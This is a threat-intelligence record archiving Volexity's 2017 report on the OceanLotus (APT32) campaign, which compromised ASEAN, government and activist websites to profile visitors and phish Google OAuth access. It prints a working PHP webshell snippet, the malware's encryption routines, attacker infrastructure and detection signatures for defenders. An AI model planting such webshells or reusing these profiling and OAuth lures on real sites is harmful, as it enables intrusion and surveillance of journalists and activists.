{ "id": "2ed50a9d-3f31-454a-9882-832a96e52d41", "created_at": "2026-04-06T00:15:15.409151Z", "updated_at": "2026-04-10T13:11:41.895876Z", "deleted_at": null, "sha1_hash": "3264963acb73ff23add60985ee4d3814b2358a58", "title": "OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3234363, "plain_text": "OceanLotus Blossoms: Mass Digital Surveillance and Attacks\r\nTargeting ASEAN, Asian Nations, the Media, Human Rights\r\nGroups, and Civil Society\r\nBy mindgrub\r\nPublished: 2017-11-06 · Archived: 2026-04-05 20:46:47 UTC\r\nIn May 2017, Volexity identified and started tracking a very sophisticated and extremely widespread mass digital\r\nsurveillance and attack campaign targeting several Asian nations, the ASEAN organization, and hundreds of\r\nindividuals and organizations tied to media, human rights and civil society causes. These attacks are being\r\nconducted through numerous strategically compromised websites and have occurred over several high-profile\r\nASEAN summits. Volexity has tied this attack campaign to an advanced persistent threat (APT) group first\r\nidentified as OceanLotus by SkyEye Labs in 2015. OceanLotus, also known as APT32, is believed to be a\r\nVietnam-based APT group that has become increasingly sophisticated in its attack tactics, techniques, and\r\nprocedures (TTPs). Volexity works closely with several human rights and civil society organizations. A few of\r\nthese organizations have specifically been targeted by OceanLotus since early 2015. As a result, Volexity has been\r\nable to directly observe and investigate various attack campaigns. This report is based on a very targeted attack\r\nthat Volexity observed and the research that followed.\r\nKey highlights of this most recent and ongoing attack campaign by the OceanLotus group are as follows:\r\nMassive digital profiling and information collection campaign via strategically compromised websites\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 1 of 20\n\nOver 100 websites of individuals and organizations tied to Government, Military, Human Rights, Civil\r\nSociety, Media, State Oil Exploration, and more used to launch attacks around the globe\r\nUse of whitelists to target only specific individuals and organizations\r\nCustom Google Apps designed for gaining access to victim Gmail accounts to steal e-mail and contacts\r\nStrategic and targeted JavaScript delivery to modify the view of compromised websites to facilitate social\r\nengineering of visitors to install malware or provide access to e-mail accounts\r\nLarge distributed attack infrastructure spanning numerous hosting providers and countries\r\nNumerous attacker created domains designed to mimic legitimate online services and organizations such as\r\nAddThis, Disqus, Akamai, Baidu, Cloudflare, Facebook, Google, and others\r\nHeavy uses of Let’s Encrypt SSL/TLS certificates\r\nUse of multiple backdoors, such as Cobalt Strike and others, believed to be developed and solely used by\r\nOceanLotus\r\nVolexity believes the size and scale of this attack campaign have only previously been rivaled by a Russian APT\r\ngroup commonly referred to as Turla and documented in a report from Symantec called The Waterbug attack\r\ngroup. The OceanLotus threat group has successfully operated, largely unnoticed, through several high-profile\r\nwebsites since late 2016. Volexity has observed the following operating pattern for the OceanLotus group:\r\nCompromise website of strategic importance (e.g. websites visitors have a higher likelihood to be targets of\r\ninterest)\r\nAdd one or more webshell backdoors to victim websites to maintain persistence\r\nWebshell used to add JavaScript developed by OceanLotus into the website\r\nThe malicious JavaScript makes calls over HTTP or HTTPS to attacker controlled domains to typically\r\nload one of two different OceanLotus frameworks\r\nOceanLotus JavaScript frameworks designed to track, profile, and target the compromised website’s\r\nvisitors\r\nWebsite visitors of interest are flagged for targeting and receive special JavaScript aimed at compromising\r\nthe user’s system or e-mail accounts\r\nVolexity has also noted that some of the organizations with compromised websites have also been targeted with\r\nspear phishing campaigns that attempt to install backdoors on the target systems. Spear phishing activity and\r\ndetailed malware infrastructure  will be described in a follow on report on OceanLotus activity.\r\nCompromised Sites\r\nVolexity has been able to identify a staggeringly large number of websites that have been strategically\r\ncompromised by the OceanLotus attackers. The number of compromised websites exceeds 100. The\r\noverwhelming majority of the websites that have been compromised belong to Vietnamese individuals and\r\norganizations that are critical of the Vietnamese Government. The remainder of the compromised websites are \r\ntied to one of three countries that share a land border with Vietnam or the Philippines. Unlike with the Vietnamese\r\nvictims, in most cases these websites are tied to state owned or affiliated organizations.\r\nVietnam\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 2 of 20\n\nVolexity has chosen not to list the Vietnamese websites that have been compromised, as the quantity is\r\nexceedingly large (over 80) and many of them are tied to individuals or very small organizations. However, the list\r\nbelow characterizes the types of websites that have been victimized to facilitate this ongoing campaign.\r\nHuman Rights\r\nCivil Society\r\nNews/Media (English and Vietnamese Language)\r\nIndividual Bloggers\r\nReligion\r\nASEAN\r\nOrganization Website Compromised Page\r\nAssociation of Southeast Asian\r\nNations (ASEAN)\r\nasean.org\r\n/modules/aseanmail/js/wp-mailinglist.js\r\n/modules/wordpress-popup/inc/external/wpmu-lib/js/wpmu-ui.3.min.js\r\nASEAN Trade Repository atr.asean.org Main Index\r\nASEAN Investment investasean.asean.org Main Index\r\nCambodia\r\nOrganization Website Compromised Page\r\nMinistry of Foreign Affairs www.mfa.gov.kh /jwplayer.js\r\nMinistry of Environment www.moe.gov.kh /other/js/jquery/jquery.js\r\nMinistry of Civil Service www.mcs.gov.kh Main Index\r\nNational Police www.police.gov.kh /wp-includes/js/jquery/jquery.js?ver=1.12.4\r\nMinistry of National Assembly-Senate Relations and Inspection\r\nwww.monasri.gov.kh wtemplates/monasri_template/js/menu/mega.js\r\nMinistry of Social Affairs,\r\nVeterans, and Youth Rehabilitation\r\nwww.mosvy.gov.kh /public/js/default.js\r\nNational Election Committee www.necelect.org.kh Main Index\r\nChina\r\nOrganization Website Compromised Page\r\nBDStar Information Service Co. bdstarlbs.com Main Index\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 3 of 20\n\nBDStar Navigation Co. www.navchina.com Main Index\r\nChina National United Oil Corporation www.chinaoil.com.cn /chinaoil/xhtml/js/jquery-1.7.2.min.js\r\nChina Oilfield Services Limited Withheld Withheld\r\nChina National Offshore Oil Corporation Withheld Withheld\r\nLaos\r\nOrganization Website Compromised Page\r\nBokeo Province bokeo.gov.la Main Index\r\nMinistry of Public Works and Transport www.mpwt.gov.la /media/system/js/mootools-core.js\r\nPhilippines\r\nOrganization Website Compromised Page\r\nArmed Forces of the Philippines www.afp.mil.ph /modules/mod_js_flexslider/assets/js/jquery.easing.js\r\nOffice of the President op-proper.gov.ph Main Index\r\nJavaScript Tracking, Profiling, and Delivery Frameworks\r\nThe compromised websites are being leveraged to deliver malicious JavaScript designed to profile and fingerprint\r\na user on each visit. Volexity found that OceanLotus had developed two different JavaScript frameworks to\r\naccomplish their profiling and targeting activities. For the purposes of this blog, we will call them Framework A\r\nand Framework B. With few exceptions, the compromised websites would only have code loading either\r\nFramework A or Framework B. Each of the hostnames and IPs were also tied to one of the two frameworks, with\r\nnone of them serving up both. The following sections will provide some detail on the two frameworks and their\r\nmultiple scripting components.\r\nFramework A\r\nFramework A is found on a limited number of victim sites. Initial URLs for access to Framework A are typically\r\nformatted similar to the following:\r\ncloudflare-api[.]com/ajax/libs/jquery/2.1.3/jquery.min.js?s=1\u0026v=72580\r\nVolexity believes the v= value is unique and serves as a victim site identifier, which may not be necessary given\r\nthe data the script sends along as detailed below. The above script is retrieved following a visit to asean.org. The\r\nfollowing code has been appended to legitimate JavaScript loaded by the ASEAN website:\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 4 of 20\n\nFramework A, Script 1 – Host Tracking\r\nThe first script delivered contains several support functions such as an MD5 function, a base64 decoder, and\r\nfunctions for loading additional data. The goal of this script appears to be defining everything needed to track a\r\nhost across different requests.\r\nThis script defines a section of variables used in other parts of the code. The host based ones are obtained from the\r\nUser-Agent in the initial request.\r\nThen it will load a second JavaScript file:\r\nThe h1 and h2 values in the request are MD5 hashes of some information about the host making the request. The\r\nfirst hash, h1, is the MD5 hash of various pieces of information collected from the browser and concatenated\r\ntogether.\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 5 of 20\n\nThe second hash, h2, is also an MD5 hash, but the values concatenated are the screen height and width, timezone,\r\nplugins, MIME type, and language information.\r\nThe encrypt function simply iterates over the passed string and key string and adds the ASCII values at each\r\nposition. Python scripts for encrypting and decrypting are as follows.\r\nEncrypt:\r\n#!/usr/bin/env python\r\nimport base64\r\nimport sys\r\nb64_data = base64.b64encode(sys.argv[2])\r\nkey = sys.argv[1]\r\nenc_data = \"\"\r\nfor i, x in enumerate(b64_data):\r\n k = key[i % len(key) -1]\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 6 of 20\n\nenc_data += chr(ord(x) + ord(k))\r\nprint\r\nprint base64.b64encode(enc_data)\r\nprint\r\nDecrypt:\r\n#!/usr/bin/env python\r\nimport base64\r\nimport sys\r\nkey = sys.argv[1]\r\nb64_data = sys.argv[2]\r\nenc_data = base64.b64decode(b64_data)\r\ndec_data = \"\"\r\nfor i, x in enumerate(enc_data):\r\n k = key[i % len(key) -1]\r\n dec_data += chr(ord(x) - ord(k))\r\nprint\r\nprint base64.b64decode(dec_data)\r\nprint\r\nFramework A, Script 2 – Profiling\r\nThe second script returned starts by defining a browser_hash variable. This is composed of h1 and the first 10\r\ncharacters of h2, separated by “–“. This script then sends three GET requests, each with a d parameter in the query\r\nstring that contains some encrypted and base64 encoded data.\r\nOne request sends “Browser Plugins.” The info is collected in the following part of the code:\r\nAnother request sends “Extended Browser Info.” This info is collected as follows:\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 7 of 20\n\nThe final request sends “WebRTC” info to obtain the host IP address.\r\nFramework B\r\nFramework B is found on the vast majority of sites. Initial URLs for access to Framework B are simply references\r\nto JavaScript (.js) files on OceanLotus controlled sites. Volexity has found that the URLs from Framework B do\r\nnot actually matter, so long as the file extension ends in .js and a referrer is sent with the request. The JavaScript\r\nwill be sent back regardless of the file or folder requested as long as it meets these two criteria.\r\nThe main ASEAN website is one of the few places that contain both Framework A and Framework B.\r\nThe following code has also been appended to legitimate JavaScript loaded by the ASEAN website:\r\nThis script will result in the loading of JavaScript from the following URL:\r\nhttp://ad.jqueryclick[.]com/assets/adv.js\r\nFramework B, Script 1 – Host Tracking\r\nThe second framework collects similar information, but handles host tracking differently. The initial script that is\r\ndelivered varies based on the host OS as determined from the User-Agent in the request. When the script is\r\nloaded, it first makes a GET request to https://health-ray-id[.]com/robot.txt. This returns a UUID that is sent in\r\nsubsequent requests as either zuuid or client_zuuid.It is also saved in localStorage for the compromised site\r\nunder a key of x00Sync. The script then makes two GET requests.\r\nRequest 1:\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 8 of 20\n\nGET /api/\u003cBASE64_ENCODED_DATA\u003e/adFeedback.js\r\nThe base64 data decodes to a JSON string containing information for tracking the host. For example, the data\r\nbelow, where zuuid is the UUID returned from health-ray-id.com.\r\n{\"uuid\":\"62d096b35e82547b6a12607c2820f8e0\",\"zuuid\":\"ca3a8d02-a0f5-4686-9f6b-cab4a17a9e2b\",\"\r\nThe uuid value (also seen as client_uuid in later requests) is also generated by the script and is stored in a cookie\r\nnamed ___APISID for the compromised domain.  It is generated using the fingerprintjs2 library, which creates a\r\nhash based on browser information.  This is another method for tracking users across requests.  This library and\r\nseveral other legitimate JavaScript libraries (including the jQuery core library and others for reading/storing\r\ncookies, collecting timezone data, etc.) are typically downloaded from a CDN URL and saved into localStorage\r\nvariables to be later used by the script.  They are stored as hex encoded data in a function called x00Config.\r\nIf the client is not on the OceanLotus whitelist, this request just returns a single line of JavaScript setting a\r\nvariable named timestamp. However, when the client is on the whitelist, Volexity has observed a popup window\r\nthat slowly fades in on top of the legitimate website. In a recent attack, the popup appeared Google related and\r\nwould redirect to a Google OAuth page designed to fool the user into providing access to their account to a\r\nmalicious Google App. More details on this appear further down in this post.\r\nRequest 2:\r\nGET /sync/\u003cBASE64 _ENCODED_DATA/img_blank.gif\r\nThis request contains two pieces of information: a history section and a navigator section. The history section\r\ncontains information about the compromised site that the JavaScript was loaded from. It also contains certain\r\ninformation about the host including the User-Agent, time and timezone, and IP addresses.\r\nThe navigator section is blank the first time the request is made. When the script is first run, it records the current\r\ntime in another localStorage variable. It only populates the navigator section if 24 hours have passed. It will also\r\nupdate the stored timestamp. This means the large section of data in the navigator section is only sent once per\r\nday, even if this compromised site is visited multiple times. This section includes a lot of the same information\r\ncollected by Framework A, including MIME Types, plugins, and screen information. Below are a few portions of\r\nthe data collected and sent back to the OceanLotus servers.\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 9 of 20\n\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 10 of 20\n\nFramework B, Script 2 – Popup for Whitelisted Systems\r\nAs mentioned above, if a system is not on the whitelist, the GET\r\n/api/\u003cBASE64_ENCODED_DATA\u003e/adFeedback.js request will just return a timestamp variable. For a\r\nwhitelisted system, a new script is delivered.  A portion of this script shown below makes a request to download\r\nsome additional config data.\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 11 of 20\n\nThe domain for the request is loaded from the SAPIS_ID cookie which was set by the first script. Before storing,\r\nit is split in two, the two substrings are reversed, then it is base64 encoded. An example of the SAPIS_ID cookie\r\ncan be seen in the navigator section above.  This ultimately calls the e.fn_getjson() function that makes a request\r\nlike the following:\r\nGET /connect.js?\r\ntimestamp=59ba12f2eb1e240cd9431624\u0026code=rtp\u0026s1=64c6e32b951adc4f3d5661dba2330141\r\nThis returns a JSON config like the following:\r\nThese are saved and accessed via a getConfigs() function for different actions the script can perform.\r\nUltimately, the script presents a popup over the site saying the content is blocked and requests that the visitor sign\r\nin to continue. The code below presents this page and tracks progress using the postShow() and postDown()\r\nfunctions, which send GET requests using the URLs shown above. When one of the buttons is clicked, the user is\r\nredirected to login to the application.\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 12 of 20\n\nWhitelisted Targeting for Google Account Access\r\nVolexity was able to work with organizations on the OceanLotus whitelist that received special responses from\r\nFramework B. As a result, Volexity was able to directly observe two different OceanLotus attacks that attempted\r\nto fool the targeted user into providing access to their Google Accounts. OceanLotus attempts to compromise\r\nGoogle Accounts by prompting the user with a popup directing them to provide OAuth authorizations to a\r\nmalicious Google App.\r\nOnce a user has been flagged for targeting, they will receive a popup when accessing an OceanLotus\r\ncompromised website once every 24 hours. This popup slowly fades in over top of the legitimate website and\r\nappears quite legitimate. Screen shots of two different observed popups are shown below.\r\nVersion 1: Locked Content\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 13 of 20\n\nVersion 2: Chrome Sign In\r\nRegardless of which option the user clicks, they are redirected to Google to initiate OAuth access to one of\r\nOceanLotus’ Google Apps. Below is a screen shot of what a user would see prior to authorizing the the nefarious\r\nGoogle App.\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 14 of 20\n\nOceanLotus Google App OAuth\r\nIf the targeted user chooses ALLOW, the OceanLotus Google App immediately logs into the account and starts\r\naccessing it. The account has permissions to access all e-mail and contacts, which is all the access OceanLotus\r\nneeds to conduct digital surveillance. Volexity strongly recommends that anyone that thinks they may have been\r\ntargeted with this campaign or similar attacks review the Defense Against Ocean Lotus section below.\r\nOceanLotus is also known to be distributing malware in the form of fake Internet Explorer, Chrome, and Firefox\r\nupdates. Volexity has observed similar attacks via spear phishing against targeted organizations that leverage some\r\nof the same malware infrastructure. In these cases, the following Amazon S3 buckets were used to distribute the\r\nmalware through JavaScript as part of OceanLotus Framework B or direct links from spear phishing campaigns.\r\ndload01.s3.amazonaws.com\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 15 of 20\n\ndownload-attachments.s3.amazonaws.com\r\nVolexity has observed multiple custom malware families and Cobalt Strike delivered through these campaigns.\r\nDetails on the observed malware samples are forthcoming.\r\nVictim Websites Backdoored\r\nVolexity has worked with multiple victim organizations to assist with incident response efforts and to remedy their\r\ncompromised systems. This process lead to the identification of different ways the OceanLotus group gains access\r\nto the compromised websites and how they maintain access.\r\nInitial Compromise\r\nVolexity has observed OceanLotus compromising sites one of two ways:\r\n1. Direct user account access to the website’s content management system (CMS)\r\n2. Exploitation of outdated plugins and/or CMS components\r\nIt is currently unknown how the intruders gain working credentials to the victim websites. Based on the TTPs\r\nleveraged by OceanLotus, it is possible that credentials could have been socially engineered (phished) from the\r\nvictims or that the system administrators have been backdoored and a keylogger has assisted in capturing the login\r\ncredentials. Alternatively, it is possible that some of the credentials were simply guessed. Several of the\r\nVietnamese websites are running on Google’s Blogspot platform, so it is reasonable to believe that those users’\r\nGoogle accounts may be compromised. In the case of exploitation, the CMS software used by the victim\r\norganizations was often woefully out of date. Both the core components and added plugins had remotely\r\nexploitable vulnerabilities that lead to compromise.\r\nPersistent Access\r\nIn all examined cases, OceanLotus attackers added PHP webshells to the victim websites. In most cases, the\r\nintruders added a new file that was designed to blend in with the web directory in which it was placed. In some\r\ncases, Volexity observed OceanLotus adding PHP code to an existing legitimate file already on the webserver.\r\nif(@$_POST['\u003cvariable-1\u003e']\u0026\u0026@md5(md5($_POST['\u003cvariable-2\u003e']))=='\u003cmd5 hash\u003e') {\r\n$x=\"\\x62\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65\";@eval($x($_POST['\u003cvariable-1\u003e']));exit();\r\nThe hex code storage in $x translates to base64_decode. This code checks to see if variable-1 is set and then\r\nvalidates whether the MD5 of the MD5 of the value set for variable-2 matches an expected MD5 hash. If these\r\nboth evaluate as true, the contents of variable-1 are base64 decoded and evaluated on the system. This is a simple\r\nwebshell that, similar to a China Chopper shell, allows direct execution on the system under the privileges of the\r\naccount running the webserver. The OceanLotus intruders use these shells to interact with the system and update\r\ntheir JavaScript code on the various websites.\r\nOceanLotus also appears to have a potentially automated process that periodically checks if the webshells are still\r\npresent on the victim systems.\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 16 of 20\n\nCampaign Infrastructure\r\nVolexity has identified a vast and sprawling amount of infrastructure leveraged by OceanLotus as a part of this\r\nstrategic web compromise campaign. There are even more indicators associated with various malware campaigns\r\nthat Volexity will detail in another OceanLotus post to follow. OceanLotus’s attack infrastructure has several\r\nunique characteristics, which makes it easy to identify if a particular system is under their control. As a result,\r\nVolexity was able to identify numerous systems that were not directly observed in active attacks but are strongly\r\nbelieved to be tied to OceanLotus. In the sections below, the infrastructure has been separated into active and\r\ninactive/unknown categories. If the infrastructure is listed as active, this means that Volexity has directly\r\nobserved the hostname’s use in an attack. If the infrastructure is listed as inactive/unknown, this means that\r\nVolexity found evidence the hostname was used in a past attack but is no longer in use or it has never been\r\nobserved in a direct attack but has unique characteristics indicative of OceanLotus infrastructure.\r\nActive\r\nHostname IPv4 Address IPv6 Address\r\na.doulbeclick.org 45.76.147.201 2001:19f0:4400:48ea:5400:ff:fe71:3201\r\nad.adthis.org 45.77.39.101 2001:19f0:4400:48fd:5400:ff:fe71:3202\r\nad.jqueryclick.com 64.62.174.146 N/A\r\napi.querycore.com 64.62.174.41 N/A\r\nbrowser-extension.jdfkmiabjpfjacifcmihfdjhpnjpiick.com\r\n79.143.87.174 N/A\r\ncdn-js.com 128.199.227.80 N/A\r\ncdn.adsfly.co 45.32.100.179 2001:19f0:4400:4798:5400:ff:fe71:3200\r\ncdn.disqusapi.com 45.76.179.28 2001:19f0:4400:4989:5400:ff:fe71:3204\r\ncloudflare-api.com 45.32.105.45 NA\r\ncory.ns.webjzcnd.com 139.59.223.191 NA\r\ngooglescripts.com 45.114.117.164 NA\r\nhealth-ray-id.com 138.197.236.215 2604:a880:2:d0::378c:e001\r\nhit.asmung.net 45.32.114.49 NA\r\njquery.google-script.org 45.32.105.45 NA\r\njs.ecommer.org 45.76.179.151 2001:19f0:4400:48fd:5400:ff:fe71:3202\r\ns.jscore-group.com 64.62.174.17 NA\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 17 of 20\n\ns1.gridsumcontent.com 103.28.44.112 NA\r\ns1.jqueryclick.com 64.62.174.145 NA\r\nssl.security.akamaihd-d.com 37.59.198.131 NA\r\nstat.cdnanalytic.com 203.114.75.22 NA\r\nstats.widgetapi.com 64.62.174.99 NA\r\ntrack-google.com 203.114.75.73 NA\r\nupdate.security.akamaihd-d.com 89.33.64.207 N/A\r\nupdate.webfontupdate.com 188.166.219.18 2400:6180:0:d0::4315:d001\r\nwiget.adsfly.co 45.32.100.179 2001:19f0:4400:4798:5400:ff:fe71:3200\r\nwww.googleuserscontent.org 139.59.217.207 2400:6180:0:d0::4315:7001\r\nInactive/Unknown Status\r\nVolexity was able to identify a substantial amount of infrastructure that belongs to OceanLotus that is setup in a\r\nmanner consistent with the above hostnames. However, Volexity has not directly observed attacks leveraging these\r\nhostnames.\r\nHostname IPv4 Address IPv6 Address\r\nad.linksys-analytic.com 64.62.174.16 N?A\r\nads.alternativeads.net 45.77.39.101 2001:19f0:4400:48fd:5400:ff:fe71:3202\r\napi.2nd-weibo.com 64.62.174.146 N/A\r\napi.analyticsearch.org 64.62.174.41 N/A\r\napi.baiduusercontent.com 79.143.87.174 N/A\r\napi.disquscore.com 128.199.227.80 N/A\r\napi.fbconnect.net* sinkholed N/A\r\ncache.akamaihd-d.com 89.33.64.232 N/A\r\ncloud.corewidget.com 139.59.217.207 2400:6180:0:d0::4315:7001\r\ncore.alternativeads.net 139.59.220.12 2400:6180:0:d0::4315:9001\r\nd3.advertisingbaidu.com 139.59.223.191 NA\r\neclick.analyticsearch.org 64.62.174.21 N/A\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 18 of 20\n\ngoogle-js.net 45.32.105.45 NA\r\ngoogle-js.org 45.32.105.45 NA\r\ngoogle-script.net 45.32.105.45 N/A\r\ngs.baidustats.com 103.28.44.115 NA\r\nlinked.livestreamanalytic.com 139.59.220.10 2400:6180:0:d0::4315:8001\r\nlinksys-analytic.com 64.62.174.17 NA\r\nlive.webfontupdate.com 188.166.219.18 2400:6180:0:d0::4315:d001\r\nstatic.livestreamanalytic.com 139.59.220.10 2400:6180:0:d0::4315:8001\r\nstats.corewidget.com 139.59.217.207 2400:6180:0:d0::4315:7001\r\nupdate.akamaihd-d.com 37.59.198.130 NA\r\nupdate.webfontupdate.com 188.166.219.18 2400:6180:0:d0::4315:d001\r\nupgrade.liveupdateplugins.com 128.199.90.216 2400:6180:0:d0::4315:c001\r\nwidget.jscore-group.com 64.62.174.9 NA\r\nDefending Against OceanLotus\r\nWhile the described attack campaign relies on fooling a user, the popups on the websites are quite convincing and\r\nlegitimate looking. As a result, Volexity would recommend immediately putting in blocks or sinkholes for the\r\ndomains and IP addresses listed above to prevent profiling and possible exploitation. The observed attacks thus far\r\nhave relied on social engineering campaigns; however, it would be trivial for OceanLotus to introduce an exploit\r\ninto this chain. As for malware indicators, Volexity will be providing additional data related to malware and\r\nbackdoor infrastructure in a future write-up to follow soon.\r\nWhen it comes to Google accounts, Volexity would recommend that users enable the 2-Step Authentication. This\r\nis an effective way to prevent access to a Google account should the password be compromised. However, in the\r\ncase of this OceanLotus campaign, the attackers are leveraging a Google App that has OAuth authorized access to\r\nthe victim’s e-mail and contacts. This effectively bypasses 2-Step authentication as a result. Users should be very\r\ncareful to only authorize legitimate and known Google Apps. Users can verify what Google Apps have access to\r\ntheir account by visiting the following URL:\r\nhttps://myaccount.google.com/u/1/permissions\r\nThis will list the Google Apps with access to the account along with their permission levels. It is possible to\r\ndefend against unauthorized applications and increase a Google Accounts security through the Google Advanced\r\nProtection Program as well\r\nUsers can further verify what Google Apps and devices are accessing their account via the following steps:\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 19 of 20\n\nLog into Gmail from a web browser via https://mail.google.com\r\nScroll to the bottom of the page and click Details to see a list of recent accesses to the account\r\nIf any access stands out as coming from an unauthorized application or address, the guidance in the steps on the\r\nfollowing page should be reviewed:\r\nhttps://support.google.com/mail/answer/7036019\r\nFinally, for website administrators, the key recommendations are as follows:\r\nUse strong passwords for CMS and system authentication\r\nRestrict access to the system and CMS functionality as much as possible (limited users, ACLs, etc.)\r\nImplement two-factor (2FA) where possible\r\nKeep operating systems, CMS software, and CMS plugins up-to-date\r\nDisable or remove any accounts that are no longer needed or are unrecognized\r\nNetwork Signatures\r\nIn addition to the domains and IP addresses, the following network signatures can be used to detect various\r\nOceanLotus profiling and targeting activity.\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:”Volex – OceanLotus JavaScript Load\r\n(connect.js)”; flow:to_server,established; content:”GET”; http_method; content:”connect.js?\r\ntimestamp=”; http_uri; sid:2017083001; )\r\nalert http $EXTERNAL_NET any -\u003e $HOME_NET any (msg:”Volex – OceanLotus JavaScript Fake\r\nPage URL Builder Response”; flow:to_client,established; file_data;content:”{|22|link|22|:|22|http”;\r\ndepth:13; file_data; content:”|22|load|22|”; sid:2017083002; rev:1;)\r\nalert http $EXTERNAL_NET any -\u003e $HOME_NET any (msg:”Volex – OceanLotus System Profiling\r\nJavaScript (linkStorage.x00SOCKET)”; flow:to_client,established; file_data;\r\ncontent:”linkStorage.x00SOCKET”; sid:2017083003;)\r\nConclusion\r\nVolexity believes the OceanLotus threat group has rapidly advanced its capabilities and is now one of the more\r\nsophisticated APT actors currently in operation. While Volexity does not typically engage in attempting attribution\r\nof any threat actor, Volexity does agree with previously reported assessments that OceanLotus is likely operating\r\nout of Vietnam. This is largely due to the extreme and wide-scale nature of certain targeting that would be\r\nextremely unlikely to align with the interests of those outside of Vietnam. As a result, Volexity believes that\r\nOceanLotus has been rapidly developing a highly skilled and organized computer network exploitation (CNE)\r\ncapability.\r\nSource: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-medi\r\na-human-rights-and-civil-society/\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE" ], "origins": [ "web" ], "references": [ "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/" ], "report_names": [ "oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "af509bbb-8d18-4903-a9bd-9e94099c6b30", "created_at": "2023-01-06T13:46:38.585525Z", "updated_at": "2026-04-10T02:00:03.030833Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "OceanLotus", "ATK17", "G0050", "APT-C-00", "APT-32", "Canvas Cyclone", "SeaLotus", "Ocean Buffalo", "OceanLotus Group", "Cobalt Kitty", "Sea Lotus", "APT 32", "POND LOACH", "TIN WOODLAWN", "Ocean Lotus" ], "source_name": "MISPGALAXY:APT32", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "870f6f62-84f5-48ca-a18e-cf2902cd6924", "created_at": "2022-10-25T15:50:23.303818Z", "updated_at": "2026-04-10T02:00:05.301184Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "APT32", "SeaLotus", "OceanLotus", "APT-C-00", "Canvas Cyclone" ], "source_name": "MITRE:APT32", "tools": 